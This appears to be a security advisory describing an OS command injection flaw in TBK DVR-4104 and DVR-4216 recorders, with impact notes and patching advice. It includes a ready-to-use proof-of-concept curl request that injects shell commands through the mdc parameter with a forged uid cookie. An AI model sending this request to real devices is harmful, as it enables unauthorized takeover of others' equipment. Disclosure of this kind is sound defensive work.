The TBK DVR devices are now found to be vulnerable to a more severe command injection. Unlike CVE-2018-9995, the newly discovered vulnerability enables execution of arbitrary commands on the device's operating system, affecting over 114,000 devices on the Internet.
- TBK DVR-4104
- TBK DVR-4216
CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
This is achieved through a specially crafted POST request to the /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___
endpoint. By manipulating the mdb
and mdc
parameters, attackers can execute shell commands, as demonstrated by the PoC.
-
The attacker sends a POST request to the vulnerable DVR device:
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
The vulnerability allows unauthorized remote attackers to execute arbitrary commands on the device. This could lead to unauthorized access to device data, modification of system configurations, or a complete compromise of the device.
- Apply available patches and updates from the device manufacturer.